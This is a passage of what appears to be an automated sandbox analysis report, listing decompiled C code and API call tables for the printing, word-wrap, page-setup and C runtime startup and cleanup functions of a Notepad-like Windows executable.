                                                  						}
                                                  						_t179 = _a12;
                                                  						_t174 = _t172->bottom - _t93 * _v88.tmHeight + _t93 * _v88.tmHeight;
                                                  						_v16.cy = _t174;
                                                  						do {
                                                  							_t169 = _t179[3];
                                                  							if(_t169 != 0 ||  *_t179 >= _t179[1]) {
                                                  								L30:
                                                  								if( *0x10c3f9c == 0) {
                                                  									_t170 = _t179[3];
                                                  									goto L40;
                                                  								} else {
                                                  									goto L31;
                                                  								}
                                                  							} else {
                                                  								while(1) {
                                                  									L16:
                                                  									_t162 =  *( *_t179) & 0x0000ffff;
                                                  									if(_t162 == 0xa || _t162 == 0xd) {
                                                  										goto L30;
                                                  									}
                                                  									if(_t162 != 9) {
                                                  										if(_t169 >= 0x1f4) {
                                                  											goto L28;
                                                  										} else {
                                                  											_t179[3] = _t179[3] + 1;
                                                  											_t179[2][_t169] = _t162;
                                                  											goto L27;
                                                  										}
                                                  									} else {
                                                  										_t171 = 0;
                                                  										do {
                                                  											_t163 = _t179[3];
                                                  											if(_t163 >= 0x1f4) {
                                                  												if( *0x10c3f9c == 0) {
                                                  													goto L23;
                                                  												}
                                                  											} else {
                                                  												_t179[2][_t163] = 0x20;
                                                  												_t174 = _v16.cy;
                                                  												_t179[3] = _t163 + 1;
                                                  												goto L23;
                                                  											}
                                                  											L27:
                                                  											_t169 = _t179[3];
                                                  											if(_t169 < 0x1f4) {
                                                  												L29:
                                                  												 *_t179 =  *_t179 + 2;
                                                  												if( *_t179 < _t179[1]) {
                                                  													goto L16;
                                                  												} else {
                                                  													goto L30;
                                                  												}
                                                  											} else {
                                                  												L28:
                                                  												if( *0x10c3f9c != 0) {
                                                  													L31:
                                                  													GetTextExtentExPointW(_v8, _t179[2], _t179[3], _v20[2] -  *_v20,  &_a12, 0,  &_v28);
                                                  													_t170 = _a12;
                                                  													if(_t170 < _t179[3]) {
                                                  														_t120 = _t179[2];
                                                  														_t164 =  &(_t120[_t170]);
                                                  														if(_t120[_t170] != 0x20) {
                                                  															_t121 = _t170;
                                                  															if(_t170 != 0) {
                                                  																while( *_t164 != 0x20) {
                                                  																	_t164 = _t164 - 2;
                                                  																	_t121 = _t121 - 1;
                                                  																	if(_t121 != 0) {
                                                  																		continue;
                                                  																	}
                                                  																	goto L37;
                                                  																}
                                                  															}
                                                  															L37:
                                                  															if(_t121 > 0) {
                                                  																_t170 = _t121 + 1;
                                                  																L40:
                                                  																_a12 = _t170;
                                                  															}
                                                  														}
                                                  													}
                                                  												} else {
                                                  													goto L29;
                                                  												}
                                                  											}
                                                  											goto L41;
                                                  											L23:
                                                  											_t171 = _t171 + 1;
                                                  										} while (_t171 < 8);
                                                  										goto L27;
                                                  									}
                                                  									goto L41;
                                                  								}
                                                  								goto L30;
                                                  							}
                                                  							L41:
                                                  							if(_a4 != 0) {
                                                  								ExtTextOutW(_v8,  *_v20, _t156, 4, _v20, _t179[2], _t170, 0);
                                                  								_t170 = _a12;
                                                  							}
                                                  							_t59 =  &(_t179[3]);
                                                  							 *_t59 = _t179[3] - _t170;
                                                  							_t96 = _t179[3];
                                                  							if( *_t59 == 0) {
                                                  								_t175 = _t179[1];
                                                  								if( *_t179 < _t175) {
                                                  									while(_t156 < _v16.cy) {
                                                  										_t170 =  *_t179;
                                                  										_t128 =  *_t170 & 0x0000ffff;
                                                  										if(_t128 == 0xa) {
                                                  											L50:
                                                  											_t156 = _t156 + _v88.tmExternalLeading + _v88.tmHeight;
                                                  											goto L51;
                                                  										} else {
                                                  											if(_t128 == 0xd) {
                                                  												if(_t128 == 0xa) {
                                                  													goto L50;
                                                  												}
                                                  												L51:
                                                  												_t131 = _t170 + 2;
                                                  												 *_t179 = _t131;
                                                  												if(_t131 < _t175) {
                                                  													continue;
                                                  												}
                                                  											}
                                                  										}
                                                  										goto L52;
                                                  									}
                                                  								}
                                                  								L52:
                                                  								_t174 = _v16.cy;
                                                  							} else {
                                                  								E010A81F0(_t179[2],  &(_t179[2][_t170]), _t96 + _t96);
                                                  								_t184 = _t184 + 0xc;
                                                  								_t156 = _t156 + _v88.tmExternalLeading + _v88.tmHeight;
                                                  							}
                                                  						} while ( *_t179 < _t179[1] && _t156 < _t174);
                                                  						_t180 = _a8;
                                                  						if( *_t180 == 0) {
                                                  							_t157 = _v8;
                                                  							goto L59;
                                                  						} else {
                                                  							_t104 = lstrlenW(_t180);
                                                  							_t157 = _v8;
                                                  							GetTextExtentPoint32W(_t157, _t180, _t104,  &_v16);
                                                  							if(_a4 != 0) {
                                                  								_t176 = _v20;
                                                  								_t106 = lstrlenW(_a8);
                                                  								asm("cdq");
                                                  								ExtTextOutW(_t157, _v20[2] - _v16.cx +  *_v20 - _t170 >> 1, _v20->bottom - _v16.cy, 4, _t176, _a8, _t106, 0);
                                                  								_t180 = _a8;
                                                  								L59:
                                                  								if(_a4 != 0) {
                                                  									EndPage(_t157);
                                                  								}
                                                  							}
                                                  						}
                                                  						HeapFree(GetProcessHeap(), 0, _t180);
                                                  						return 1;
                                                  					} else {
                                                  						MessageBoxW( *0x10c3f24, L"StartPage failed", L"Print Error", 0x30);
                                                  						HeapFree(GetProcessHeap(), 0, _t178);
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 010A1890: GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A18F0
                                                    • Part of subcall function 010A1890: HeapAlloc.KERNEL32(00000000), ref: 010A18F7
                                                  • StartPage.GDI32 ref: 010A19B0
                                                  • MessageBoxW.USER32(StartPage failed,Print Error,00000030), ref: 010A19CC
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A19D5
                                                  • HeapFree.KERNEL32(00000000), ref: 010A19DC
                                                  • GetTextMetricsW.GDI32(?,?), ref: 010A19F2
                                                  • GetTextExtentPoint32W.GDI32(?,010C43B0,00000000), ref: 010A1A19
                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,010C43B0,00000000), ref: 010A1A4F
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000), ref: 010A1A7F
                                                  • GetTextExtentExPointW.GDI32(?,00000000,?,00000000,?,00000000,?), ref: 010A1B58
                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,00000000,?,00000000), ref: 010A1BB3
                                                  • _memmove.LIBCMT ref: 010A1BCF
                                                  • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 010A1C3F
                                                  • lstrlenW.KERNEL32(?,00000000,?,?), ref: 010A1C59
                                                  • ExtTextOutW.GDI32(?,?,00000000,00000004,?,?,00000000), ref: 010A1C76
                                                  • EndPage.GDI32(?), ref: 010A1C8B
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 010A1C94
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 010A1C9B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Text$Heap$Extent$Point32Process$FreePage$AllocMessageMetricsPointStart_memmovelstrlen
                                                  • String ID: Print Error$StartPage failed
                                                  • API String ID: 1514916518-1681616764
                                                  • Opcode ID: c715c7e5aff2b88ee9ab638bd266860adb3502512a7afbf7e788e3d3105650e2
                                                  • Instruction ID: 1fd3a96bbde844559cde83e076cc4f915cf648cc8b05bce6663b29778c271b45
                                                  • Opcode Fuzzy Hash: c715c7e5aff2b88ee9ab638bd266860adb3502512a7afbf7e788e3d3105650e2
                                                  • Instruction Fuzzy Hash: 17B17A31610205EFEB20CF98C984FAAB7F9FF45310F548959FAD69B250E735A980CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E010A21F0() {
                                                  				struct tagRECT _v20;
                                                  				void* _t10;
                                                  				int _t12;
                                                  				struct HWND__* _t18;
                                                  				signed int _t26;
                                                  				long _t30;
                                                  				void* _t31;
                                                  				void* _t34;
                                                  				int _t37;
                                                  
                                                  				_t1 = GetWindowTextLengthW( *0x10c3f2c) + 1; // 0x1
                                                  				_t37 = _t1;
                                                  				_t10 = HeapAlloc(GetProcessHeap(), 0, _t37 + _t37);
                                                  				_t31 = _t10;
                                                  				if(_t31 != 0) {
                                                  					GetWindowTextW( *0x10c3f2c, _t31, _t37);
                                                  					_t12 = SendMessageW( *0x10c3f2c, 0xb8, 0, 0);
                                                  					DestroyWindow( *0x10c3f2c);
                                                  					GetClientRect( *0x10c3f24,  &_v20);
                                                  					_t17 =  !=  ? 0x50b000c4 : 0x50a00044;
                                                  					_t18 = CreateWindowExW(0x200, L"edit", 0,  !=  ? 0x50b000c4 : 0x50a00044, 0, 0, _v20.right, _v20.bottom,  *0x10c3f24, 0,  *0x10c3f20, 0);
                                                  					 *0x10c3f2c = _t18;
                                                  					SendMessageW(_t18, 0x30,  *0x10c3f30, 0);
                                                  					SetWindowTextW( *0x10c3f2c, _t31);
                                                  					SendMessageW( *0x10c3f2c, 0xb9, _t12, 0);
                                                  					SetFocus( *0x10c3f2c);
                                                  					HeapFree(GetProcessHeap(), 0, _t31);
                                                  					_t26 = 0 |  *0x10c3f9c == 0x00000000;
                                                  					 *0x10c3f9c = _t26;
                                                  					asm("sbb eax, eax");
                                                  					_t30 = CheckMenuItem(GetMenu( *0x10c3f24), 0x119,  ~_t26 & 0x00000008);
                                                  					__imp__#410( *0x10c3f2c, 0x10a2880, 0, 0, _t34);
                                                  					return _t30;
                                                  				}
                                                  				return _t10;
                                                  			}

                                                  APIs
                                                  • GetWindowTextLengthW.USER32 ref: 010A21FE
                                                  • GetProcessHeap.KERNEL32(00000000), ref: 010A220D
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A2214
                                                  • GetWindowTextW.USER32 ref: 010A222D
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A2248
                                                  • DestroyWindow.USER32 ref: 010A2252
                                                  • GetClientRect.USER32 ref: 010A2262
                                                  • CreateWindowExW.USER32 ref: 010A22A3
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 010A22B9
                                                  • SetWindowTextW.USER32(00000000), ref: 010A22C2
                                                  • SendMessageW.USER32(000000B9,00000000,00000000), ref: 010A22D6
                                                  • SetFocus.USER32 ref: 010A22DE
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A22E7
                                                  • HeapFree.KERNEL32(00000000), ref: 010A22EE
                                                  • GetMenu.USER32(00000119), ref: 010A2317
                                                  • CheckMenuItem.USER32(00000000), ref: 010A231E
                                                  • #410.COMCTL32(010A2880,00000000,00000000), ref: 010A2333
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Window$Heap$MessageSendText$MenuProcess$#410AllocCheckClientCreateDestroyFocusFreeItemLengthRect
                                                  • String ID: edit
                                                  • API String ID: 2317382731-2167791130
                                                  • Opcode ID: 4fb1c42572464a47442d786c0c4fa3d639d2f88abba13bbf4ceed1f38e5a6e98
                                                  • Instruction ID: 10edfe82064319b03e1315704a2249590825abf2de24a43de09c37d32d48b037
                                                  • Opcode Fuzzy Hash: 4fb1c42572464a47442d786c0c4fa3d639d2f88abba13bbf4ceed1f38e5a6e98
                                                  • Instruction Fuzzy Hash: F931ED72250206FFEB312BA1ED9AF963A79FB08701F108424F6C5A9198D77B58159F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2600(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				void* _t21;
                                                  				void* _t48;
                                                  				void* _t61;
                                                  				struct HWND__* _t78;
                                                  				struct HWND__* _t79;
                                                  
                                                  				_t21 = _a8 - 0x110;
                                                  				if(_t21 == 0) {
                                                  					_t78 = _a4;
                                                  					SetDlgItemTextW(_t78, 0x141, 0x10c4ca0);
                                                  					SetDlgItemTextW(_t78, 0x143, 0x10c4ea8);
                                                  					SetDlgItemInt(_t78, 0x14d, (0x51eb851f *  *0x10c4c90 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c90 >> 0x20 >> 5), 0);
                                                  					SetDlgItemInt(_t78, 0x150, (0x51eb851f *  *0x10c4c94 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c94 >> 0x20 >> 5), 0);
                                                  					SetDlgItemInt(_t78, 0x147, (0x51eb851f *  *0x10c4c98 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c98 >> 0x20 >> 5), 0);
                                                  					SetDlgItemInt(_t78, 0x14a, (0x51eb851f *  *0x10c4c9c >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c9c >> 0x20 >> 5), 0);
                                                  					goto L9;
                                                  				} else {
                                                  					if(_t21 != 1) {
                                                  						L9:
                                                  						return 0;
                                                  					} else {
                                                  						_t48 = _a12 - 1;
                                                  						if(_t48 == 0) {
                                                  							_t79 = _a4;
                                                  							GetDlgItemTextW(_t79, 0x141, 0x10c4ca0, 0);
                                                  							GetDlgItemTextW(_t79, 0x143, 0x10c4ea8, 0);
                                                  							 *0x10c4c90 = GetDlgItemInt(_t79, 0x14d, 0, 0) * 0x64;
                                                  							 *0x10c4c94 = GetDlgItemInt(_t79, 0x150, 0, 0) * 0x64;
                                                  							 *0x10c4c98 = GetDlgItemInt(_t79, 0x147, 0, 0) * 0x64;
                                                  							 *0x10c4c9c = GetDlgItemInt(_t79, 0x14a, 0, 0) * 0x64;
                                                  							EndDialog(_t79, 1);
                                                  							return 1;
                                                  						} else {
                                                  							_t61 = _t48 - 1;
                                                  							if(_t61 == 0) {
                                                  								EndDialog(_a4, 2);
                                                  								return 1;
                                                  							} else {
                                                  								if(_t61 != 7) {
                                                  									goto L9;
                                                  								} else {
                                                  									MessageBoxW( *0x10c3f24, L"Sorry, no help available", L"Help", 0x30);
                                                  									return 1;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • MessageBoxW.USER32(Sorry, no help available,Help,00000030), ref: 010A263E
                                                  • EndDialog.USER32(?,00000002), ref: 010A2654
                                                  • GetDlgItemTextW.USER32(?,00000141,010C4CA0,00000000), ref: 010A267B
                                                  • GetDlgItemTextW.USER32(?,00000143,010C4EA8,00000000), ref: 010A268A
                                                  • GetDlgItemInt.USER32(?,0000014D,00000000,00000000), ref: 010A269C
                                                  • GetDlgItemInt.USER32(?,00000150,00000000,00000000), ref: 010A26B0
                                                  • GetDlgItemInt.USER32(?,00000147,00000000,00000000), ref: 010A26C4
                                                  • GetDlgItemInt.USER32(?,0000014A,00000000,00000000), ref: 010A26D8
                                                  • EndDialog.USER32(?,00000001), ref: 010A26E5
                                                  • SetDlgItemTextW.USER32 ref: 010A270A
                                                  • SetDlgItemTextW.USER32 ref: 010A2717
                                                  • SetDlgItemInt.USER32(?,0000014D,?,00000000), ref: 010A273D
                                                  • SetDlgItemInt.USER32(?,00000150,?,00000000), ref: 010A275D
                                                  • SetDlgItemInt.USER32(?,00000147,?,00000000), ref: 010A277D
                                                  • SetDlgItemInt.USER32(?,0000014A,?,00000000), ref: 010A279D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Item$Text$Dialog$Message
                                                  • String ID: Help$Sorry, no help available
                                                  • API String ID: 3223884555-856071037
                                                  • Opcode ID: 6d091967fcdedace25d588154406a258791e7b57040edebcef3ca7aebf525512
                                                  • Instruction ID: 28fe9ae9913a805be3ec31335ef15df6bf296d206d16ef08df91510d8753adf1
                                                  • Opcode Fuzzy Hash: 6d091967fcdedace25d588154406a258791e7b57040edebcef3ca7aebf525512
                                                  • Instruction Fuzzy Hash: 3441A9317903087BF62417ADAC83FBA7AA9E7D4F10F044036F385EE2D4C6E5A9015B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010B6728(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				intOrPtr _t12;
                                                  				intOrPtr _t13;
                                                  				intOrPtr _t17;
                                                  				intOrPtr* _t45;
                                                  
                                                  				if(_a4 > 5 || _a8 == 0) {
                                                  					L4:
                                                  					return 0;
                                                  				} else {
                                                  					_t45 = E010A8C83(8, 1);
                                                  					if(_t45 != 0) {
                                                  						_t12 = E010A8C83(0xb8, 1);
                                                  						 *_t45 = _t12;
                                                  						__eflags = _t12;
                                                  						if(_t12 != 0) {
                                                  							_t13 = E010A8C83(0x220, 1);
                                                  							 *((intOrPtr*)(_t45 + 4)) = _t13;
                                                  							__eflags = _t13;
                                                  							if(_t13 != 0) {
                                                  								E010B6250( *_t45, 0x10c1da0);
                                                  								__eflags = E010B6B48(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
                                                  								if(__eflags != 0) {
                                                  									_t17 = E010A97EB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
                                                  									__eflags = _t17;
                                                  									if(_t17 == 0) {
                                                  										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
                                                  										L17:
                                                  										return _t45;
                                                  									}
                                                  									E010A8C4B( *((intOrPtr*)(_t45 + 4)));
                                                  									E010AEB5D( *_t45);
                                                  									E010AEA03( *_t45);
                                                  									E010A8C4B(_t45);
                                                  									L15:
                                                  									_t45 = 0;
                                                  									goto L17;
                                                  								}
                                                  								E010AEB5D( *_t45);
                                                  								E010AEA03( *_t45);
                                                  								E010A8C4B(_t45);
                                                  								goto L15;
                                                  							}
                                                  							E010A8C4B( *_t45);
                                                  							E010A8C4B(_t45);
                                                  							L8:
                                                  							goto L3;
                                                  						}
                                                  						E010A8C4B(_t45);
                                                  						goto L8;
                                                  					}
                                                  					L3:
                                                  					 *((intOrPtr*)(E010A6117())) = 0xc;
                                                  					goto L4;
                                                  				}
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                  • String ID:
                                                  • API String ID: 2661855409-0
                                                  • Opcode ID: a2e9e089b6541f68af114566a0688c3dd7f117c710c7ee7af15b200ca94d0fe3
                                                  • Instruction ID: b6698b5b4b186e8a0a6ae6b62b97c6a8c6a6124a953df3f5ee8031f81c8378b5
                                                  • Opcode Fuzzy Hash: a2e9e089b6541f68af114566a0688c3dd7f117c710c7ee7af15b200ca94d0fe3
                                                  • Instruction Fuzzy Hash: 9F213431045606EAEB223FA8DC48ECEBFE5FF61752B50846EE4C555061FF3398408A64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr _t17;
                                                  				void* _t24;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				signed int _t38;
                                                  				void* _t47;
                                                  				signed int _t50;
                                                  				void* _t52;
                                                  				void* _t54;
                                                  
                                                  				_t48 = __edi;
                                                  				_t47 = __edx;
                                                  				E010A7F04();
                                                  				_push(0x14);
                                                  				_push(0x10befc0);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				_t50 = E010A80DD() & 0x0000ffff;
                                                  				E010A4843(2);
                                                  				_t54 =  *0x10a0000 - 0x5a4d; // 0x5a4d
                                                  				if(_t54 == 0) {
                                                  					_t17 =  *0x10a003c; // 0xe8
                                                  					__eflags =  *((intOrPtr*)(_t17 + 0x10a0000)) - 0x4550;
                                                  					if( *((intOrPtr*)(_t17 + 0x10a0000)) != 0x4550) {
                                                  						goto L2;
                                                  					} else {
                                                  						__eflags =  *((intOrPtr*)(_t17 + 0x10a0018)) - 0x10b;
                                                  						if( *((intOrPtr*)(_t17 + 0x10a0018)) != 0x10b) {
                                                  							goto L2;
                                                  						} else {
                                                  							_t38 = 0;
                                                  							__eflags =  *((intOrPtr*)(_t17 + 0x10a0074)) - 0xe;
                                                  							if( *((intOrPtr*)(_t17 + 0x10a0074)) > 0xe) {
                                                  								__eflags =  *(_t17 + 0x10a00e8);
                                                  								_t6 =  *(_t17 + 0x10a00e8) != 0;
                                                  								__eflags = _t6;
                                                  								_t38 = 0 | _t6;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					L2:
                                                  					_t38 = 0;
                                                  				}
                                                  				 *(_t52 - 0x1c) = _t38;
                                                  				if(E010A7BCC() == 0) {
                                                  					E010A3E89(_t38, _t47, _t48, _t50, 0x1c);
                                                  				}
                                                  				if(E010A7B33(_t38, _t48) == 0) {
                                                  					_t19 = E010A3E89(_t38, _t47, _t48, _t50, 0x10);
                                                  				}
                                                  				E010A7F9E(_t19);
                                                  				 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
                                                  				E010A7347();
                                                  				 *0x10c3f18 = GetCommandLineA();
                                                  				 *0x10c2120 = E010A7FDE();
                                                  				_t24 = E010A7BF6();
                                                  				_t57 = _t24;
                                                  				if(_t24 < 0) {
                                                  					E010A44DD(_t38, _t47, _t48, _t50, _t57, 8);
                                                  				}
                                                  				_t25 = E010A7E23(_t38, _t47);
                                                  				_t58 = _t25;
                                                  				if(_t25 < 0) {
                                                  					E010A44DD(_t38, _t47, _t48, _t50, _t58, 9);
                                                  				}
                                                  				_t26 = E010A4517(_t48, _t50, 1);
                                                  				_t59 = _t26;
                                                  				if(_t26 != 0) {
                                                  					E010A44DD(_t38, _t47, _t48, _t50, _t59, _t26);
                                                  				}
                                                  				_t51 = E010A28A0(_t47, _t59, 0x10a0000, 0, E010A8183(), _t50);
                                                  				 *((intOrPtr*)(_t52 - 0x24)) = _t28;
                                                  				if(_t38 == 0) {
                                                  					E010A47CD(_t51);
                                                  				}
                                                  				E010A4508();
                                                  				 *(_t52 - 4) = 0xfffffffe;
                                                  				return E010A6235(_t51);
                                                  			}













                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                  • String ID:
                                                  • API String ID: 505799540-0
                                                  • Opcode ID: 4fccd157fe94d333a7eaf6cf35a1c31cb0a613b4942d5e277b8e572f4a5275fb
                                                  • Instruction ID: bb0d11083d0c81fca1b6b01f832cb33cfc5d6ab3b3a98d697324626250d2dd96
                                                  • Opcode Fuzzy Hash: 4fccd157fe94d333a7eaf6cf35a1c31cb0a613b4942d5e277b8e572f4a5275fb
                                                  • Instruction Fuzzy Hash: E321D374A4030BDADB607BF4B845FEE3194BF20705FD4816AF6C49E0C6EFB689408691
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E010A43D6(void* __eax, void* __ebx) {
                                                  				intOrPtr _t5;
                                                  				LONG* _t8;
                                                  				void* _t9;
                                                  				void* _t14;
                                                  				void* _t24;
                                                  				intOrPtr* _t25;
                                                  				intOrPtr* _t26;
                                                  
                                                  				_t14 = __ebx;
                                                  				__imp__DecodePointer( *0x10c3f08);
                                                  				_t25 =  *0x10c2140;
                                                  				_t24 = __eax;
                                                  				if(_t25 != 0) {
                                                  					while( *_t25 != 0) {
                                                  						E010A8C4B( *_t25);
                                                  						_t25 = _t25 + 4;
                                                  						if(_t25 != 0) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_t25 =  *0x10c2140;
                                                  				}
                                                  				_push(_t14);
                                                  				E010A8C4B(_t25);
                                                  				_t26 =  *0x10c213c;
                                                  				 *0x10c2140 = 0;
                                                  				if(_t26 != 0) {
                                                  					while( *_t26 != 0) {
                                                  						E010A8C4B( *_t26);
                                                  						_t26 = _t26 + 4;
                                                  						if(_t26 != 0) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_t26 =  *0x10c213c;
                                                  				}
                                                  				E010A8C4B(_t26);
                                                  				 *0x10c213c = 0;
                                                  				E010A8C4B( *0x10c2138);
                                                  				_t5 = E010A8C4B( *0x10c2134);
                                                  				 *0x10c2138 = 0;
                                                  				 *0x10c2134 = 0;
                                                  				if(_t24 != 0xffffffff) {
                                                  					_t5 = E010A8C4B(_t24);
                                                  				}
                                                  				__imp__EncodePointer(0);
                                                  				 *0x10c3f08 = _t5;
                                                  				_t6 =  *0x10c2a50;
                                                  				if( *0x10c2a50 != 0) {
                                                  					E010A8C4B(_t6);
                                                  					 *0x10c2a50 = 0;
                                                  				}
                                                  				_t7 =  *0x10c2a54;
                                                  				if( *0x10c2a54 != 0) {
                                                  					E010A8C4B(_t7);
                                                  					 *0x10c2a54 = 0;
                                                  				}
                                                  				_t8 = InterlockedDecrement( *0x10c16fc);
                                                  				if(_t8 == 0) {
                                                  					_t8 =  *0x10c16fc; // 0x10c19f8
                                                  					if(_t8 != 0x10c19f8) {
                                                  						_t9 = E010A8C4B(_t8);
                                                  						 *0x10c16fc = 0x10c19f8;
                                                  						return _t9;
                                                  					}
                                                  				}
                                                  				return _t8;
                                                  			}











                                                  APIs
                                                  • DecodePointer.KERNEL32 ref: 010A43DE
                                                  • _free.LIBCMT ref: 010A43F7
                                                    • Part of subcall function 010A8C4B: HeapFree.KERNEL32(00000000,00000000,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C5F
                                                    • Part of subcall function 010A8C4B: GetLastError.KERNEL32(010C15B0,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C71
                                                  • _free.LIBCMT ref: 010A440A
                                                  • _free.LIBCMT ref: 010A4428
                                                  • _free.LIBCMT ref: 010A443A
                                                  • _free.LIBCMT ref: 010A444B
                                                  • _free.LIBCMT ref: 010A4456
                                                  • _free.LIBCMT ref: 010A4470
                                                  • EncodePointer.KERNEL32(00000000), ref: 010A4477
                                                  • _free.LIBCMT ref: 010A448C
                                                  • _free.LIBCMT ref: 010A44A2
                                                  • InterlockedDecrement.KERNEL32 ref: 010A44B4
                                                  • _free.LIBCMT ref: 010A44CE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
